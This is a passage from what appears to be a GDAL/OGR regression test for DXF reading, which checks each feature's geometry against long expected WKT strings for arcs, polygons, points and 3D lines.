# LINESTRING Z (2 4 0,2.00487189948035 4.06975647374412 0,2.01946386251686 4.13917310096007 0,2.04370479853239 4.20791169081776 0,2.07747660812336 4.275637355817 0,2.12061475842818 4.34202014332567 0,2.1729090847148 4.4067366430758 0,2.23410481428215 4.46947156278589 0,2.30390380768715 4.52991926423321 0,2.38196601125011 4.58778525229247 0,2.46791111376204 4.64278760968654 0,2.5613203993227 4.694658370459 0,2.66173878728228 4.74314482547739 0,2.76867704934868 4.78801075360672 0,2.88161419305851 4.82903757255504 0,3.0 4.86602540378444 0,3.12325770642185 4.89879404629917 0,3.25078681316818 4.92718385456679 0,3.38196601125011 4.95105651629515 0,3.51615620880067 4.970295726276 0,3.65270364466614 4.98480775301221 0,3.79094307346469 4.99452189536827 0,3.930201006595 4.9993908270191 0,4.069798993405 4.9993908270191 0,4.20905692653531 4.99452189536827 0,4.34729635533386 4.98480775301221 0,4.48384379119934 4.970295726276 0,4.61803398874989 4.95105651629515 0,4.74921318683182 4.92718385456679 0,4.87674229357816 4.89879404629917 0,5.0 4.86602540378444 0,5.11838580694149 4.82903757255504 0,5.23132295065132 4.78801075360672 0,5.33826121271772 4.74314482547739 0,5.4386796006773 4.694658370459 0,5.53208888623796 4.64278760968654 0,5.61803398874989 4.58778525229247 0,5.69609619231285 4.5299192642332 0,5.76589518571785 4.46947156278589 0,5.8270909152852 4.4067366430758 0,5.87938524157182 4.34202014332567 0,5.92252339187664 4.275637355817 0,5.95629520146761 4.20791169081776 0,5.98053613748314 4.13917310096006 0,5.99512810051965 4.06975647374412 0,6.0 4.0 0,5.99512810051965 3.93024352625587 0,5.98053613748314 3.86082689903993 0,5.95629520146761 3.79208830918224 0,5.92252339187664 3.724362644183 0,5.87938524157182 3.65797985667433 0,5.8270909152852 3.5932633569242 0,5.76589518571785 3.53052843721411 0,5.69609619231285 3.4700807357668 0,5.61803398874989 3.41221474770753 0,5.53208888623796 3.35721239031346 0,5.4386796006773 3.305341629541 0,5.33826121271772 3.25685517452261 
0,5.23132295065132 3.21198924639328 0,5.11838580694149 3.17096242744496 0,5.0 3.13397459621556 0,4.87674229357815 3.10120595370083 0,4.74921318683182 3.07281614543321 0,4.61803398874989 3.04894348370485 0,4.48384379119934 3.029704273724 0,4.34729635533386 3.01519224698779 0,4.20905692653531 3.00547810463173 0,4.069798993405 3.0006091729809 0,3.930201006595 3.0006091729809 0,3.79094307346469 3.00547810463173 0,3.65270364466614 3.01519224698779 0,3.51615620880066 3.029704273724 0,3.38196601125011 3.04894348370485 0,3.25078681316818 3.07281614543321 0,3.12325770642185 3.10120595370083 0,3.0 3.13397459621556 0,2.88161419305851 3.17096242744496 0,2.76867704934868 3.21198924639328 0,2.66173878728228 3.25685517452261 0,2.5613203993227 3.305341629541 0,2.46791111376204 3.35721239031346 0,2.38196601125011 3.41221474770753 0,2.30390380768715 3.4700807357668 0,2.23410481428215 3.53052843721411 0,2.1729090847148 3.5932633569242 0,2.12061475842818 3.65797985667433 0,2.07747660812336 3.724362644183 0,2.04370479853239 3.79208830918224 0,2.01946386251686 3.86082689903993 0,2.00487189948035 3.93024352625587 0,2 4 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (2 4 0,2.00487189948035 4.06975647374412 0,2.01946386251686 4.13917310096007 0,2.04370479853239 4.20791169081776 0,2.07747660812336 4.275637355817 0,2.12061475842818 4.34202014332567 0,2.1729090847148 4.4067366430758 0,2.23410481428215 4.46947156278589 0,2.30390380768715 4.52991926423321 0,2.38196601125011 4.58778525229247 0,2.46791111376204 4.64278760968654 0,2.5613203993227 4.694658370459 0,2.66173878728228 4.74314482547739 0,2.76867704934868 4.78801075360672 0,2.88161419305851 4.82903757255504 0,3.0 4.86602540378444 0,3.12325770642185 4.89879404629917 0,3.25078681316818 4.92718385456679 0,3.38196601125011 4.95105651629515 0,3.51615620880067 4.970295726276 0,3.65270364466614 4.98480775301221 0,3.79094307346469 4.99452189536827 0,3.930201006595 4.9993908270191 0,4.069798993405 4.9993908270191 0,4.20905692653531 4.99452189536827 0,4.34729635533386 4.98480775301221 0,4.48384379119934 4.970295726276 0,4.61803398874989 4.95105651629515 0,4.74921318683182 4.92718385456679 0,4.87674229357816 4.89879404629917 0,5.0 4.86602540378444 0,5.11838580694149 4.82903757255504 0,5.23132295065132 4.78801075360672 0,5.33826121271772 4.74314482547739 0,5.4386796006773 4.694658370459 0,5.53208888623796 4.64278760968654 0,5.61803398874989 4.58778525229247 0,5.69609619231285 4.5299192642332 0,5.76589518571785 4.46947156278589 0,5.8270909152852 4.4067366430758 0,5.87938524157182 4.34202014332567 0,5.92252339187664 4.275637355817 0,5.95629520146761 4.20791169081776 0,5.98053613748314 4.13917310096006 0,5.99512810051965 4.06975647374412 0,6.0 4.0 0,5.99512810051965 3.93024352625587 0,5.98053613748314 3.86082689903993 0,5.95629520146761 3.79208830918224 0,5.92252339187664 3.724362644183 0,5.87938524157182 3.65797985667433 0,5.8270909152852 3.5932633569242 0,5.76589518571785 3.53052843721411 0,5.69609619231285 3.4700807357668 0,5.61803398874989 3.41221474770753 0,5.53208888623796 3.35721239031346 0,5.4386796006773 3.305341629541 
0,5.33826121271772 3.25685517452261 0,5.23132295065132 3.21198924639328 0,5.11838580694149 3.17096242744496 0,5.0 3.13397459621556 0,4.87674229357815 3.10120595370083 0,4.74921318683182 3.07281614543321 0,4.61803398874989 3.04894348370485 0,4.48384379119934 3.029704273724 0,4.34729635533386 3.01519224698779 0,4.20905692653531 3.00547810463173 0,4.069798993405 3.0006091729809 0,3.930201006595 3.0006091729809 0,3.79094307346469 3.00547810463173 0,3.65270364466614 3.01519224698779 0,3.51615620880066 3.029704273724 0,3.38196601125011 3.04894348370485 0,3.25078681316818 3.07281614543321 0,3.12325770642185 3.10120595370083 0,3.0 3.13397459621556 0,2.88161419305851 3.17096242744496 0,2.76867704934868 3.21198924639328 0,2.66173878728228 3.25685517452261 0,2.5613203993227 3.305341629541 0,2.46791111376204 3.35721239031346 0,2.38196601125011 3.41221474770753 0,2.30390380768715 3.4700807357668 0,2.23410481428215 3.53052843721411 0,2.1729090847148 3.5932633569242 0,2.12061475842818 3.65797985667433 0,2.07747660812336 3.724362644183 0,2.04370479853239 3.79208830918224 0,2.01946386251686 3.86082689903993 0,2.00487189948035 3.93024352625587 0,2 4 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):10
# EntityHandle (String) = 1BF
# LINESTRING Z (2.0 2.0 0,1.96657794502105 2.03582232791524 0,1.93571660708646 2.07387296203834 0,1.90756413746468 2.11396923855471 0,1.88225568337755 2.15591867344963 0,1.85991273921989 2.19951988653655 0,1.84064256332004 2.24456356819194 0,1.8245376630414 2.29083348415575 0,1.81167535069652 2.33810751357387 0,1.80211737240583 2.38615871529951 0,1.79590961168258 2.43475641733454 0,1.79308186916688 2.48366732418105 0,1.79364771956639 2.53265663678705 0,1.79760444649032 2.58148917971011 0,1.80493305548955 2.62993053008785 0,1.81559836524041 2.67774814299566 0,1.8295491764342 2.72471246778926 0,1.84671851756181 2.7705980500731 0,1.86702396641357 2.81518461400453 0,1.89036804575079 2.85825811973811 0,1.91663869124976 2.89961179093366 0,1.94570978947168 2.93904710739563 0,1.97744178327594 2.97637475807832 0,2.01168234177068 3.01141554988232 0,2.04826709158413 3.04400126787917 0,2.08702040594658 3.07397548283483 0,2.12775624779472 3.10119430215541 0,2.17027906285109 3.12552706065018 0,2.2143847183914 3.14685694779575 0,2.25986148319297 3.16508156849045 0,2.30649104396024 3.18011343460661 0,2.35404955334774 3.1918803849814 0,2.40230870454951 3.20032593182975 0,2.45103682729644 3.2054095319166 0,2.5 3.20710678118655 0,2.54896317270356 3.2054095319166 0,2.59769129545049 3.20032593182975 0,2.64595044665226 3.1918803849814 0,2.69350895603976 3.18011343460661 0,2.74013851680703 3.16508156849045 0,2.7856152816086 3.14685694779575 0,2.8297209371489 3.12552706065018 0,2.87224375220528 3.10119430215541 0,2.91297959405342 3.07397548283483 0,2.95173290841587 3.04400126787917 0,2.98831765822932 3.01141554988232 0,3.02255821672406 2.97637475807832 0,3.05429021052832 2.93904710739563 0,3.08336130875024 2.89961179093367 0,3.10963195424921 2.85825811973811 0,3.13297603358643 2.81518461400453 0,3.15328148243819 2.7705980500731 0,3.1704508235658 2.72471246778926 0,3.18440163475959 2.67774814299567 0,3.19506694451045 2.62993053008786 0,3.20239555350968 2.58148917971011 0,3.20635228043361 
2.53265663678705 0,3.20691813083312 2.48366732418105 0,3.20409038831742 2.43475641733454 0,3.19788262759417 2.38615871529951 0,3.18832464930348 2.33810751357387 0,3.1754623369586 2.29083348415575 0,3.15935743667996 2.24456356819194 0,3.14008726078011 2.19951988653655 0,3.11774431662245 2.15591867344963 0,3.09243586253532 2.11396923855472 0,3.06428339291354 2.07387296203834 0,3.03342205497895 2.03582232791524 0,3 2 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (2.0 2.0 0,1.96657794502105 2.03582232791524 0,1.93571660708646 2.07387296203834 0,1.90756413746468 2.11396923855471 0,1.88225568337755 2.15591867344963 0,1.85991273921989 2.19951988653655 0,1.84064256332004 2.24456356819194 0,1.8245376630414 2.29083348415575 0,1.81167535069652 2.33810751357387 0,1.80211737240583 2.38615871529951 0,1.79590961168258 2.43475641733454 0,1.79308186916688 2.48366732418105 0,1.79364771956639 2.53265663678705 0,1.79760444649032 2.58148917971011 0,1.80493305548955 2.62993053008785 0,1.81559836524041 2.67774814299566 0,1.8295491764342 2.72471246778926 0,1.84671851756181 2.7705980500731 0,1.86702396641357 2.81518461400453 0,1.89036804575079 2.85825811973811 0,1.91663869124976 2.89961179093366 0,1.94570978947168 2.93904710739563 0,1.97744178327594 2.97637475807832 0,2.01168234177068 3.01141554988232 0,2.04826709158413 3.04400126787917 0,2.08702040594658 3.07397548283483 0,2.12775624779472 3.10119430215541 0,2.17027906285109 3.12552706065018 0,2.2143847183914 3.14685694779575 0,2.25986148319297 3.16508156849045 0,2.30649104396024 3.18011343460661 0,2.35404955334774 3.1918803849814 0,2.40230870454951 3.20032593182975 0,2.45103682729644 3.2054095319166 0,2.5 3.20710678118655 0,2.54896317270356 3.2054095319166 0,2.59769129545049 3.20032593182975 0,2.64595044665226 3.1918803849814 0,2.69350895603976 3.18011343460661 0,2.74013851680703 3.16508156849045 0,2.7856152816086 3.14685694779575 0,2.8297209371489 3.12552706065018 0,2.87224375220528 3.10119430215541 0,2.91297959405342 3.07397548283483 0,2.95173290841587 3.04400126787917 0,2.98831765822932 3.01141554988232 0,3.02255821672406 2.97637475807832 0,3.05429021052832 2.93904710739563 0,3.08336130875024 2.89961179093367 0,3.10963195424921 2.85825811973811 0,3.13297603358643 2.81518461400453 0,3.15328148243819 2.7705980500731 0,3.1704508235658 2.72471246778926 0,3.18440163475959 2.67774814299567 0,3.19506694451045 2.62993053008786 
0,3.20239555350968 2.58148917971011 0,3.20635228043361 2.53265663678705 0,3.20691813083312 2.48366732418105 0,3.20409038831742 2.43475641733454 0,3.19788262759417 2.38615871529951 0,3.18832464930348 2.33810751357387 0,3.1754623369586 2.29083348415575 0,3.15935743667996 2.24456356819194 0,3.14008726078011 2.19951988653655 0,3.11774431662245 2.15591867344963 0,3.09243586253532 2.11396923855472 0,3.06428339291354 2.07387296203834 0,3.03342205497895 2.03582232791524 0,3 2 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):11
# EntityHandle (String) = 1C0
# POLYGON Z ((1 2 0,1 3 0,2 3 0,2 2 0,1 2 0))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((1 2 0,1 3 0,2 3 0,2 2 0,1 2 0))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):12
# EntityHandle (String) = 1C1
# POLYGON ((3 4,4 4,4 3,3 3,3 4))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON ((3 4,4 4,4 3,3 3,3 4))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):13
# EntityHandle (String) = 1C3
# POLYGON ((8 8,9 8,9 9,8 9,8 8))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON ((8 8,9 8,9 9,8 9,8 8))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):14
# EntityHandle (String) = 1C6
# LINESTRING (2 2,2.15384615384615 2.15384615384615,2.30769230769231 2.30769230769231,2.46153846153846 2.46153846153846,2.61538461538461 2.61538461538461,2.76923076923077 2.76923076923077,2.92307692307692 2.92307692307692,3.07692307692308 3.07692307692308,3.23076923076923 3.23076923076923,3.38461538461538 3.38461538461538,3.53846153846154 3.53846153846154,3.69230769230769 3.69230769230769,3.84615384615385 3.84615384615385,4 4,4.15384615384615 4.15384615384615,4.30769230769231 4.30769230769231,4.46153846153846 4.46153846153846,4.61538461538462 4.61538461538462,4.76923076923077 4.76923076923077,4.92307692307692 4.92307692307692,5.07692307692308 5.07692307692308,5.23076923076923 5.23076923076923,5.38461538461538 5.38461538461538,5.53846153846154 5.53846153846154,5.69230769230769 5.69230769230769,5.84615384615385 5.84615384615385,6.0 6.0,6.15384615384615 6.15384615384615,6.30769230769231 6.30769230769231,6.46153846153846 6.46153846153846,6.61538461538462 6.61538461538462,6.76923076923077 6.76923076923077,6.92307692307692 6.92307692307692,7.07692307692308 7.07692307692308,7.23076923076923 7.23076923076923,7.38461538461539 7.38461538461539,7.53846153846154 7.53846153846154,7.69230769230769 7.69230769230769,7.84615384615385 7.84615384615385,8 8)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (2 2,2.15384615384615 2.15384615384615,2.30769230769231 2.30769230769231,2.46153846153846 2.46153846153846,2.61538461538461 2.61538461538461,2.76923076923077 2.76923076923077,2.92307692307692 2.92307692307692,3.07692307692308 3.07692307692308,3.23076923076923 3.23076923076923,3.38461538461538 3.38461538461538,3.53846153846154 3.53846153846154,3.69230769230769 3.69230769230769,3.84615384615385 3.84615384615385,4 4,4.15384615384615 4.15384615384615,4.30769230769231 4.30769230769231,4.46153846153846 4.46153846153846,4.61538461538462 4.61538461538462,4.76923076923077 4.76923076923077,4.92307692307692 4.92307692307692,5.07692307692308 5.07692307692308,5.23076923076923 5.23076923076923,5.38461538461538 5.38461538461538,5.53846153846154 5.53846153846154,5.69230769230769 5.69230769230769,5.84615384615385 5.84615384615385,6.0 6.0,6.15384615384615 6.15384615384615,6.30769230769231 6.30769230769231,6.46153846153846 6.46153846153846,6.61538461538462 6.61538461538462,6.76923076923077 6.76923076923077,6.92307692307692 6.92307692307692,7.07692307692308 7.07692307692308,7.23076923076923 7.23076923076923,7.38461538461539 7.38461538461539,7.53846153846154 7.53846153846154,7.69230769230769 7.69230769230769,7.84615384615385 7.84615384615385,8 8)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):15
# EntityHandle (String) = 1C7
# LINESTRING (8 1,7.62837370825536 0.987348067229724,7.25775889681215 0.975707614760869,6.88916704597178 0.966090122894857,6.52360963603567 0.959507071933107,6.16209814730525 0.956969942177043,5.80564406008193 0.959490213928084,5.45525885466714 0.968079367487651,5.11195401136229 0.983748883157167,4.77674101046882 1.00751024123805,4.45063133228814 1.04037492203173,4.13463645712167 1.08335440583961,3.82976786527082 1.13746017296313,3.53703703703704 1.2037037037037,3.25745545272173 1.28309647836275,2.99203459262631 1.37664997724169,2.74178593705221 1.48537568064195,2.50772096630085 1.61028506886495,2.29085116067365 1.75238962221211,2.09218800047203 1.91270082098484,1.91270082098485 2.09218800047202,1.75238962221211 2.29085116067364,1.61028506886495 2.50772096630085,1.48537568064195 2.74178593705221,1.37664997724169 2.99203459262631,1.28309647836275 3.25745545272172,1.2037037037037 3.53703703703703,1.13746017296313 3.82976786527082,1.08335440583961 4.13463645712166,1.04037492203173 4.45063133228814,1.00751024123805 4.77674101046882,0.983748883157167 5.11195401136229,0.968079367487652 5.45525885466714,0.959490213928084 5.80564406008193,0.956969942177043 6.16209814730525,0.959507071933108 6.52360963603567,0.966090122894857 6.88916704597178,0.975707614760869 7.25775889681216,0.987348067229724 7.62837370825537,1 8)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (8 1,7.62837370825536 0.987348067229724,7.25775889681215 0.975707614760869,6.88916704597178 0.966090122894857,6.52360963603567 0.959507071933107,6.16209814730525 0.956969942177043,5.80564406008193 0.959490213928084,5.45525885466714 0.968079367487651,5.11195401136229 0.983748883157167,4.77674101046882 1.00751024123805,4.45063133228814 1.04037492203173,4.13463645712167 1.08335440583961,3.82976786527082 1.13746017296313,3.53703703703704 1.2037037037037,3.25745545272173 1.28309647836275,2.99203459262631 1.37664997724169,2.74178593705221 1.48537568064195,2.50772096630085 1.61028506886495,2.29085116067365 1.75238962221211,2.09218800047203 1.91270082098484,1.91270082098485 2.09218800047202,1.75238962221211 2.29085116067364,1.61028506886495 2.50772096630085,1.48537568064195 2.74178593705221,1.37664997724169 2.99203459262631,1.28309647836275 3.25745545272172,1.2037037037037 3.53703703703703,1.13746017296313 3.82976786527082,1.08335440583961 4.13463645712166,1.04037492203173 4.45063133228814,1.00751024123805 4.77674101046882,0.983748883157167 5.11195401136229,0.968079367487652 5.45525885466714,0.959490213928084 5.80564406008193,0.956969942177043 6.16209814730525,0.959507071933108 6.52360963603567,0.966090122894857 6.88916704597178,0.975707614760869 7.25775889681216,0.987348067229724 7.62837370825537,1 8)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):16
# EntityHandle (String) = 1C8
# POINT Z (7 7 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (7 7 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):17
# EntityHandle (String) = 1C9
# POINT Z (-2.0 4.0 -3.46410161513775)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (-2.0 4.0 -3.46410161513775)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):18
# EntityHandle (String) = 1CA
# LINESTRING Z (0 0 0,-0.5 1.0 -0.866025403784439)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (0 0 0,-0.5 1.0 -0.866025403784439)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):19
# EntityHandle (String) = 1CB
# LINESTRING Z (-0.5 1.0 -0.866025403784439,-1.0 1.0 -1.73205080756888,-0.5 2.0 -0.866025403784439,-0.5 1.0 -0.866025403784439)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-0.5 1.0 -0.866025403784439,-1.0 1.0 -1.73205080756888,-0.5 2.0 -0.866025403784439,-0.5 1.0 -0.866025403784439)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):20
# EntityHandle (String) = 1CC
# LINESTRING Z (-0.5 1.0 -0.866025403784439,-0.5 2.0 -0.866025403784439,-1.0 2.0 -1.73205080756888,-0.5 1.0 -0.866025403784439)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-0.5 1.0 -0.866025403784439,-0.5 2.0 -0.866025403784439,-1.0 2.0 -1.73205080756888,-0.5 1.0 -0.866025403784439)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):21
# EntityHandle (String) = 1D1
# LINESTRING Z (-2.0 6.0 -3.46410161513776,-2.06975647374412 5.99512810051965 -3.58492337181942,-2.13917310096006 5.98053613748314 -3.7051564970475,-2.20791169081776 5.95629520146761 -3.82421522712167,-2.275637355817 5.92252339187664 -3.94151951987674,-2.34202014332567 5.87938524157182 -4.0564978805898,-2.4067366430758 5.8270909152852 -4.16859014624505,-2.46947156278589 5.76589518571785 -4.27725021459168,-2.5299192642332 5.69609619231285 -4.38194870469918,-2.58778525229247 5.61803398874989 -4.48217553604801,-2.64278760968654 5.53208888623796 -4.57744241359059,-2.694658370459 5.4386796006773 -4.66728520667574,-2.74314482547739 5.33826121271772 -4.75126621024651,-2.78801075360672 5.23132295065132 -4.82897627729524,-2.82903757255504 5.11838580694149 -4.90003681218666,-2.86602540378444 5.0 -4.96410161513776,-2.89879404629917 4.87674229357815 -5.02085856886833,-2.92718385456679 4.74921318683182 -5.07003115920498,-2.95105651629515 4.61803398874989 -5.11137982223042,-2.970295726276 4.48384379119934 -5.14470311141473,-2.98480775301221 4.34729635533386 -5.16983867904264,-2.99452189536827 4.20905692653531 -5.1866640671553,-2.99939082701909 4.069798993405 -5.19509730415311,-2.99939082701909 3.930201006595 -5.19509730415311,-2.99452189536827 3.79094307346469 -5.1866640671553,-2.98480775301221 3.65270364466614 -5.16983867904264,-2.970295726276 3.51615620880066 -5.14470311141473,-2.95105651629515 3.38196601125011 -5.11137982223042,-2.92718385456679 3.25078681316818 -5.07003115920498,-2.89879404629917 3.12325770642185 -5.02085856886833,-2.86602540378444 3.0 -4.96410161513776,-2.82903757255504 2.88161419305851 -4.90003681218666,-2.78801075360672 2.76867704934868 -4.82897627729524,-2.74314482547739 2.66173878728228 -4.75126621024651,-2.694658370459 2.5613203993227 -4.66728520667574,-2.64278760968654 2.46791111376204 -4.5774424135906,-2.58778525229247 2.38196601125011 -4.48217553604801,-2.5299192642332 2.30390380768715 -4.38194870469918,-2.46947156278589 2.23410481428215 
-4.27725021459168,-2.4067366430758 2.1729090847148 -4.16859014624505,-2.34202014332567 2.12061475842818 -4.0564978805898,-2.275637355817 2.07747660812336 -3.94151951987674,-2.20791169081776 2.04370479853239 -3.82421522712167,-2.13917310096006 2.01946386251686 -3.7051564970475,-2.06975647374412 2.00487189948035 -3.58492337181943,-2.0 2.0 -3.46410161513776,-1.93024352625587 2.00487189948035 -3.34327985845609,-1.86082689903993 2.01946386251686 -3.22304673322801,-1.79208830918224 2.04370479853239 -3.10398800315384,-1.724362644183 2.07747660812336 -2.98668371039877,-1.65797985667433 2.12061475842818 -2.87170534968571,-1.5932633569242 2.1729090847148 -2.75961308403046,-1.53052843721411 2.23410481428215 -2.65095301568383,
# -1.47008073576679 2.30390380768715 -2.54625452557633,-1.41221474770753 2.38196601125011 -2.4460276942275,-1.35721239031346 2.46791111376204 -2.35076081668492,-1.305341629541 2.5613203993227 -2.26091802359977,-1.25685517452261 2.66173878728228 -2.176937020029,-1.21198924639328 2.76867704934868 -2.09922695298027,-1.17096242744496 2.88161419305851 -2.02816641808885,-1.13397459621556 3.0 -1.96410161513776,-1.10120595370083 3.12325770642184 -1.90734466140718,-1.07281614543321 3.25078681316818 -1.85817207107053,-1.04894348370485 3.38196601125011 -1.81682340804509,-1.029704273724 3.51615620880066 -1.78350011886079,-1.01519224698779 3.65270364466614 -1.75836455123287,-1.00547810463173 3.79094307346469 -1.74153916312021,-1.0006091729809 3.930201006595 -1.7331059261224,-1.0006091729809 4.069798993405 -1.7331059261224,-1.00547810463173 4.20905692653531 -1.74153916312021,-1.01519224698779 4.34729635533386 -1.75836455123287,-1.029704273724 4.48384379119933 -1.78350011886078,-1.04894348370485 4.61803398874989 -1.81682340804509,-1.07281614543321 4.74921318683182 -1.85817207107053,-1.10120595370083 4.87674229357815 -1.90734466140718,-1.13397459621556 5.0 -1.96410161513776,-1.17096242744496 5.11838580694149 -2.02816641808885,-1.21198924639328 5.23132295065132 -2.09922695298027,-1.25685517452261 5.33826121271772 -2.176937020029,-1.305341629541 5.4386796006773 -2.26091802359977,-1.35721239031346 5.53208888623796 -2.35076081668492,-1.41221474770753 5.61803398874989 -2.4460276942275,-1.47008073576679 5.69609619231285 -2.54625452557633,-1.53052843721411 5.76589518571785 -2.65095301568383,-1.5932633569242 5.8270909152852 -2.75961308403046,-1.65797985667433 5.87938524157182 -2.87170534968571,-1.724362644183 5.92252339187664 -2.98668371039877,-1.79208830918224 5.95629520146761 -3.10398800315384,-1.86082689903993 5.98053613748314 -3.22304673322801,-1.93024352625587 5.99512810051965 -3.34327985845609,-2.0 6.0 -3.46410161513775)
# Read the next feature and verify its geometry matches the expected
# tessellated LINESTRING Z vertex-for-vertex; on mismatch, dump the
# feature for debugging and fail the test.
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-2.0 6.0 -3.46410161513776,-2.06975647374412 5.99512810051965 -3.58492337181942,-2.13917310096006 5.98053613748314 -3.7051564970475,-2.20791169081776 5.95629520146761 -3.82421522712167,-2.275637355817 5.92252339187664 -3.94151951987674,-2.34202014332567 5.87938524157182 -4.0564978805898,-2.4067366430758 5.8270909152852 -4.16859014624505,-2.46947156278589 5.76589518571785 -4.27725021459168,-2.5299192642332 5.69609619231285 -4.38194870469918,-2.58778525229247 5.61803398874989 -4.48217553604801,-2.64278760968654 5.53208888623796 -4.57744241359059,-2.694658370459 5.4386796006773 -4.66728520667574,-2.74314482547739 5.33826121271772 -4.75126621024651,-2.78801075360672 5.23132295065132 -4.82897627729524,-2.82903757255504 5.11838580694149 -4.90003681218666,-2.86602540378444 5.0 -4.96410161513776,-2.89879404629917 4.87674229357815 -5.02085856886833,-2.92718385456679 4.74921318683182 -5.07003115920498,-2.95105651629515 4.61803398874989 -5.11137982223042,-2.970295726276 4.48384379119934 -5.14470311141473,-2.98480775301221 4.34729635533386 -5.16983867904264,-2.99452189536827 4.20905692653531 -5.1866640671553,-2.99939082701909 4.069798993405 -5.19509730415311,-2.99939082701909 3.930201006595 -5.19509730415311,-2.99452189536827 3.79094307346469 -5.1866640671553,-2.98480775301221 3.65270364466614 -5.16983867904264,-2.970295726276 3.51615620880066 -5.14470311141473,-2.95105651629515 3.38196601125011 -5.11137982223042,-2.92718385456679 3.25078681316818 -5.07003115920498,-2.89879404629917 3.12325770642185 -5.02085856886833,-2.86602540378444 3.0 -4.96410161513776,-2.82903757255504 2.88161419305851 -4.90003681218666,-2.78801075360672 2.76867704934868 -4.82897627729524,-2.74314482547739 2.66173878728228 -4.75126621024651,-2.694658370459 2.5613203993227 -4.66728520667574,-2.64278760968654 2.46791111376204 -4.5774424135906,-2.58778525229247 2.38196601125011 -4.48217553604801,-2.5299192642332 2.30390380768715 
-4.38194870469918,-2.46947156278589 2.23410481428215 -4.27725021459168,-2.4067366430758 2.1729090847148 -4.16859014624505,-2.34202014332567 2.12061475842818 -4.0564978805898,-2.275637355817 2.07747660812336 -3.94151951987674,-2.20791169081776 2.04370479853239 -3.82421522712167,-2.13917310096006 2.01946386251686 -3.7051564970475,-2.06975647374412 2.00487189948035 -3.58492337181943,-2.0 2.0 -3.46410161513776,-1.93024352625587 2.00487189948035 -3.34327985845609,-1.86082689903993 2.01946386251686 -3.22304673322801,-1.79208830918224 2.04370479853239 -3.10398800315384,-1.724362644183 2.07747660812336 -2.98668371039877,' + \
'-1.65797985667433 2.12061475842818 -2.87170534968571,-1.5932633569242 2.1729090847148 -2.75961308403046,-1.53052843721411 2.23410481428215 -2.65095301568383,-1.47008073576679 2.30390380768715 -2.54625452557633,-1.41221474770753 2.38196601125011 -2.4460276942275,-1.35721239031346 2.46791111376204 -2.35076081668492,-1.305341629541 2.5613203993227 -2.26091802359977,-1.25685517452261 2.66173878728228 -2.176937020029,-1.21198924639328 2.76867704934868 -2.09922695298027,-1.17096242744496 2.88161419305851 -2.02816641808885,-1.13397459621556 3.0 -1.96410161513776,-1.10120595370083 3.12325770642184 -1.90734466140718,-1.07281614543321 3.25078681316818 -1.85817207107053,-1.04894348370485 3.38196601125011 -1.81682340804509,-1.029704273724 3.51615620880066 -1.78350011886079,-1.01519224698779 3.65270364466614 -1.75836455123287,-1.00547810463173 3.79094307346469 -1.74153916312021,-1.0006091729809 3.930201006595 -1.7331059261224,-1.0006091729809 4.069798993405 -1.7331059261224,-1.00547810463173 4.20905692653531 -1.74153916312021,-1.01519224698779 4.34729635533386 -1.75836455123287,-1.029704273724 4.48384379119933 -1.78350011886078,-1.04894348370485 4.61803398874989 -1.81682340804509,-1.07281614543321 4.74921318683182 -1.85817207107053,-1.10120595370083 4.87674229357815 -1.90734466140718,-1.13397459621556 5.0 -1.96410161513776,-1.17096242744496 5.11838580694149 -2.02816641808885,-1.21198924639328 5.23132295065132 -2.09922695298027,-1.25685517452261 5.33826121271772 -2.176937020029,-1.305341629541 5.4386796006773 -2.26091802359977,-1.35721239031346 5.53208888623796 -2.35076081668492,-1.41221474770753 5.61803398874989 -2.4460276942275,-1.47008073576679 5.69609619231285 -2.54625452557633,-1.53052843721411 5.76589518571785 -2.65095301568383,-1.5932633569242 5.8270909152852 -2.75961308403046,-1.65797985667433 5.87938524157182 -2.87170534968571,-1.724362644183 5.92252339187664 -2.98668371039877,-1.79208830918224 5.95629520146761 -3.10398800315384,-1.86082689903993 5.98053613748314 
-3.22304673322801,-1.93024352625587 5.99512810051965 -3.34327985845609,-2.0 6.0 -3.46410161513775)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):22
# EntityHandle (String) = 1D2
# LINESTRING Z (-1.0 4.0 -1.73205080756888,-2.0 4.0 -3.46410161513775)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-1.0 4.0 -1.73205080756888,-2.0 4.0 -3.46410161513775)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):23
# EntityHandle (String) = 1D3
# LINESTRING Z (-2.0 4.0 -3.46410161513775,-3.0 4.0 -5.19615242270663)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-2.0 4.0 -3.46410161513775,-3.0 4.0 -5.19615242270663)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):24
# EntityHandle (String) = 1D4
# LINESTRING Z (-2.0 3.0 -3.46410161513775,-2.0 4.0 -3.46410161513775)
